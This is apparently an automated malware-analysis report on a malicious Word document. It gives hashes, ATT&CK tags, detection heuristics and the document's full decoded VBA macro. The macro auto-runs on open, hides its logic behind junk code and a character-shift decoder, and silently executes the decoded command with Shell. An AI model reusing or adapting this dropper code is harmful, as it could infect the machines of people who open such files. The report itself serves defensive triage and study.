Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 049f8f402af29fcb…

MALICIOUS

Office (OLE)

53.0 KB Created: 2015-02-09 20:32:00 Authoring application: Microsoft Office Word First seen: 2015-02-17
MD5: e1c4c3d995941a2e164f01d9de516651 SHA-1: 61d0086d0407ca77f3f7bb40c6c97cf192171412 SHA-256: 049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598
178 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen and Workbook_Open subroutines are present, along with a critical heuristic firing for a potential Shell call. The VBA script attempts to write several obfuscated files to disk, such as 'BVXRMY.OSS', 'OKBMUC.PQJ', and others, indicating a dropper or downloader functionality. The ClamAV detection 'Doc.Dropper.Agent-1452123' further supports this assessment.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-1452123 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1452123
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell HUIbksdf, vbHide
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7406 bytes
SHA-256: c7898f2f10292e4318d9bf58a265434d53b9feb9f15cb2fe60e05c1e4abb4dff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
125 of 186 identifiers look randomly generated (e.g. 'ODDFHKCGIHCGHLCGGGOMEMED') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub pppJFJF()
Dim cGUWcPxh, zPghPtfu, UYCPVbyB As String

GoTo NqLZpqck
Dim djTTSBnZ As String
Open "BVXRMY.OSS" For Binary As 25
Put #25, , djTTSBnZ
Close #25
NqLZpqck:

cGUWcPxh = "           NQUVUE               "

GoTo lVBiOKpy
Dim YrQqsTfj As String
Open "OKBMUC.PQJ" For Binary As 53
Put #53, , YrQqsTfj
Close #53
lVBiOKpy:

zPghPtfu = LTrim(cGUWcPxh)

GoTo HkDNvmSG
Dim GejSxxlg As String
Open "DJGISK.VTT" For Binary As 73
Put #73, , GejSxxlg
Close #73
HkDNvmSG:

UYCPVbyB = RTrim(zPghPtfu)


GoTo xPimvGlx
Dim mmQixJNW As String
Open "ENBKSE.MBL" For Binary As 36
Put #36, , mmQixJNW
Close #36
xPimvGlx:

pJIHJffd
End Sub
Sub AutoOpen()
Dim fsvhlMHQ, HcDpekbt, tfLDoeQD As String

GoTo JgaVljrw
Dim emDaWtiT As String
Open "FHWUPH.TFH" For Binary As 72
Put #72, , emDaWtiT
Close #72
JgaVljrw:

fsvhlMHQ = "           RBJRON               "

GoTo qzyELVJp
Dim xiKYmSMm As String
Open "COVXXU.VEH" For Binary As 19
Put #19, , xiKYmSMm
Close #19
qzyELVJp:

HcDpekbt = LTrim(fsvhlMHQ)

GoTo UwWwIAlL
Dim LAUvphxr As String
Open "OLKLJX.NKD" For Binary As 54
Put #54, , LAUvphxr
Close #54
UwWwIAlL:

tfLDoeQD = RTrim(HcDpekbt)


GoTo piYElNqT
Dim wflYMFgH As String
Open "RCGTVA.FQT" For Binary As 11
Put #11, , wflYMFgH
Close #11
piYElNqT:

    pppJFJF
End Sub
Sub Workbook_Open()
Dim XYaWJqQT, WkEUGdkt, uchPjamg As String

GoTo eWqfJCwW
Dim haCjlPbt As String
Open "AHTCPB.QRW" For Binary As 23
Put #23, , haCjlPbt
Close #23
eWqfJCwW:

XYaWJqQT = "           XZFUOU               "

GoTo ngNyTbVR
Dim SmSoifzF As String
Open "SNBLTF.DMJ" For Binary As 66
Put #66, , SmSoifzF
Close #66
ngNyTbVR:

WkEUGdkt = LTrim(XYaWJqQT)

GoTo uxfzOLor
Dim yiJFUWFE As String
Open "XMZOKR.YIK" For Binary As 14
Put #14, , yiJFUWFE
Close #14
uxfzOLor:

uchPjamg = RTrim(WkEUGdkt)


GoTo CRibVecZ
Dim XgQdXtra As String
Open "JCBWBP.IXL" For Binary As 85
Put #85, , XgQdXtra
Close #85
CRibVecZ:

    pppJFJF
End Sub
Sub pJIHJffd()
Dim wyYqjDWy, juHxQJlu, diNOyXHi As String

GoTo tDKSgLQG
Dim jLRHHUFB As String
Open "MZJAUT.QAQ" For Binary As 97
Put #97, , jLRHHUFB
Close #97
tDKSgLQG:

wyYqjDWy = "           JJKPND               "

GoTo cnCkFncE
Dim PYOmhgnF As String
Open "RXLJMW.TGQ" For Binary As 34
Put #34, , PYOmhgnF
Close #34
cnCkFncE:

juHxQJlu = LTrim(wyYqjDWy)

GoTo WMQqErNd
Dim uacftJec As String
Open "GYFDFP.YRI" For Binary As 78
Put #78, , uacftJec
Close #78
WMQqErNd:

diNOyXHi = RTrim(juHxQJlu)


GoTo WHtQyrCA
Dim iXJFUKNS As String
Open "CFZOKE.UZK" For Binary As 77
Put #77, , iXJFUKNS
Close #77
WHtQyrCA:

HUIbksdf = lSqZa("x‚y5D`5e„Њz‡h}zЃЃCzЌz5=czЊBdw zx‰5hЋ€‰z‚Ccz‰ClzwXЃ~zѓ‰>CY„ЊѓЃ„vy[~Ѓz=<}‰‰…ODDFHKCGIHCGHLCGGGOMEMED}}vxЏIJvD‚ѓѓ‚ЏC…}…<A<:iZbe:q…_^d{y{€CzЌz<>Ph‰v‡‰Be‡„xz€€5<:iZbe:q…_^d{y{€CzЌz<P", "21")
Dim uqAjkzBv, SyoSRxJh, jzJuJJIi As String

GoTo xUlExbZu
Dim ODyYVfTk As String
Open "PPOTNF.WVB" For Binary As 36
Put #36, , ODyYVfTk
Close #36
xUlExbZu:

uqAjkzBv = "           QQBAGL               "

GoTo rGIbbLSU
Dim hXmZzUHK As String
Open "AFHEZC.ZUO" For Binary As 97
Put #97, , hXmZzUHK
Close #97
rGIbbLSU:

SyoSRxJh = LTrim(uqAjkzBv)

GoTo QVXmEsXi
Dim CrIctNNl As String
Open "KKCNRU.ZYD" For Binary As 83
Put #83, , CrIctNNl
Close #83
QVXmEsXi:

jzJuJJIi = RTrim(SyoSRxJh)


GoTo nplEclBb
Dim vWChwwTV As String
Open "TDTCSK.HZW" For Binary As 42
Put #42, , vWChwwTV
Close #42
nplEclBb:

Shell HUIbksdf, vbHide
End Sub

Public Function lSqZa(ByVal InputData As String, ByVal NumKey As Integer) As String
Dim i As Long, OutChar As String
For i = 1 To Len(InputData)
Dim LitKzAbh, iVqwidQV, xFhBdBCY As String

GoTo bjGCAYXH
Dim QxANrlBa As String
Open "TJGYFV.YPI" For Binary As 43
Put #43, , QxANrlBa
Close #43
bjGCAYXH:

LitKzAbh = "           SDZPQV               "

GoTo ubrKTByj
Dim lTHWuDpA As String
Open "XWCRHI.DMJ" For Binary As 94
Put #94, , lTHWuDpA
Close #94
ubrKTByj:

iVqwidQV = LTrim(LitKzAbh)

GoTo zenrdrDZ
Dim foduFKJD As String
Open "NMDKWE.AFT" For Binary As 99
Put #99, , foduFKJD
Close #99
zenrdrDZ:

xFhBdBCY = RTrim(iVqwidQV)


GoTo EMGXEnli
Dim GNABtfxl As String
Open "FHMFRF.FOS" For Binary As 48
Put #48, , GNABtfxl
Close #48
EMGXEnli:

OutChar = Asc(Mid(InputData, i, 1)) - NumKey
While OutChar < 0
Dim BKGHJxMo, qVALlqCl, crfXWVaE As String

GoTo qearGJfJ
Dim xoDukTka As String
Open "RMNKPX.FIH" For Binary As 44
Put #44, , xoDukTka
Close #44
qearGJfJ:

BKGHJxMo = "           VUITOD               "

GoTo eNFziNyi
Dim gyntOFol As String
Open "NLLJLA.ASQ" For Binary As 23
Put #23, , gyntOFol
Close #23
eNFziNyi:

qVALlqCl = LTrim(BKGHJxMo)

GoTo VEqfFyDl
Dim XfFaSilL As String
Open "JCNGMQ.AQH" For Binary As 85
Put #85, , XfFaSilL
Close #85
VEqfFyDl:

crfXWVaE = RTrim(qVALlqCl)


GoTo SHUnxVOu
Dim QnqfmNgT As String
Open "QEQWQU.ZZY" For Binary As 67
Put #67, , QnqfmNgT
Close #67
SHUnxVOu:

OutChar = OutChar + 256
Dim xbQLzBbC, lbWtxrCV, fntkJimB As String

GoTo SHRSTXlg
Dim QAibEVND As String
Open "QRPAHY.ZZR" For Binary As 67
Put #67, , QAibEVND
Close #67
SHRSTXlg:

xbQLzBbC = "           KAWZLL               "

GoTo RDkQVtsT
Dim HLrFbLgH As String
Open "UZRNBQ.IXX" For Binary As 57
Put #57, , HLrFbLgH
Close #57
RDkQVtsT:

lbWtxrCV = LTrim(xbQLzBbC)

GoTo bjGCRqLK
Dim QcANuVXz As String
Open "TJGYGD.XHP" For Binary As 43
Put #43, , QcANuVXz
Close #43
bjGCRqLK:

fntkJimB = RTrim(lbWtxrCV)


GoTo sCZKpxyg
Dim cegWSqpb As String
Open "VUORTL.GTR" For Binary As 18
Put #18, , cegWSqpb
Close #18
sCZKpxyg:

Wend
Dim XVmMIxzW, ALzhXKMS, yFPPodQR As String

GoTo sCbrlmJx
Dim cesuWiMU As String
Open "TKSKVQ.GYZ" For Binary As 18
Put #18, , cesuWiMU
Close #18
sCbrlmJx:

XVmMIxzW = "           YTXGVR               "

GoTo jhxlghyb
Dim EwowHepP As String
Open "IAPBXO.IME" For Binary As 23
Put #23, , EwowHepP
Close #23
jhxlghyb:

ALzhXKMS = LTrim(XVmMIxzW)

GoTo blUAklyX
Dim QvlRMuoy As String
Open "SZHRVP.XHY" For Binary As 43
Put #43, , QvlRMuoy
Close #43
blUAklyX:

yFPPodQR = RTrim(ALzhXKMS)


GoTo sLKSjUTv
Dim vBRGLwIO As String
Open "THWOCK.GRQ" For Binary As 42
Put #42, , vBRGLwIO
Close #42
sLKSjUTv:

 lSqZa = lSqZa + Chr(OutChar)
Dim JLTHoAGC, ltMPKBvj, IMBfVPPB As String

GoTo Prxklump
Dim IFNrjoaI As String
Open "PPYHOS.MVX" For Binary As 69
Put #69, , IFNrjoaI
Close #69
Prxklump:

JLTHoAGC = "           KHMJRJ               "

GoTo eXyUcSWK
Dim aYOlwFAj As String
Open "MYVVSA.MNH" For Binary As 98
Put #98, , aYOlwFAj
Close #98
eXyUcSWK:

ltMPKBvj = LTrim(JLTHoAGC)

GoTo ofzXlUqM
Dim uBTOkOHl As String
Open "XGXYPB.DFH" For Binary As 12
Put #12, , uBTOkOHl
Close #12
ofzXlUqM:

IMBfVPPB = RTrim(ltMPKBvj)


GoTo UvUAmuNT
Dim TpqfloYt As String
Open "OWQWPS.NLY" For Binary As 54
Put #54, , TpqfloYt
Close #54
UvUAmuNT:

Next
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.